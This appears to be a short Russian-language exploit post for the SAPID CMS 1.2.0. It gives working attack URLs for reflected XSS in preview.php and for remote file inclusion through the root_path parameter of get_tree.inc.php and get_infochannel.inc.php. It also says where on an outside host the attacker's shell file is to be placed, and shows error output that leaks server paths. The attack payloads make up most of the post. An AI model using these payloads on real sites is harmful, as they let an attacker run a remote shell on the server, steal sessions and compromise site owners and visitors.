SAPID Version 1.2.0 (_http://sapid.sf.net/)


(1) ...: Лже-инклуд :...

http://bug.ru/usr/system/preview.php?name="><h1>xss(инклуд, толку от которого нет. Поэтому
используем для Passive XSS). Ну и можно посмотреть установочный путь...



(2) ...: Полноценный инклуд :...

http://bug.ru/usr/extensions/get_tree.inc.php?root_path=http://ya.ru/
http://bug.ru/usr/extensions/get_infochannel.inc.php?root_path=http://ya.ru


(В то время как ваш шелл должен быть тут: http://ya.ru/usr/system/common_extfunctions.inc.php)

Если вдруг админ изменил путь, но багу не прикрыл(врятли такое может быть), путь, который открыть
бажный скрипт вы увидите, обратившись к нему без параметров. Тогда вы увидите уже привычные
и радующие глаз строчки, указывающие на этот самый изменённый путь:


Warning: main(usr/system/common_extfunctions.inc.php): failed to open stream: No such file or directory in z:\home\bug.ru\www\xex\usr\extensions\get_tree.inc .php on line 11
Warning: main(): Failed opening 'usr/system/common_extfunctions.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in z:\home\bug.ru\www\xex\usr\extensions\get_tree.inc .php on line 11




_Я__З_Н_А_Ю_, ЧТО УЖЕ ЕСТЬ ВЕРСИЯ 1.2.3 !!! НО!!!

Уязвимостей к этой версии движка в багтраках я не нашёл (именно тех инклудов, что я вам сейчас
показал), поэтому меня терзают смутные сомнения, что эту багу прикрыли без лишнего шума, как это
уже было с phpBB (если я не ошибаюсь, именно там как-то нашли инклуд, но бага осталась в привате, а
в паблик она попала через одно видео на xakep.ru)








p.s. если же я всё-таки пропустил ленту с этим багом, извиняйте...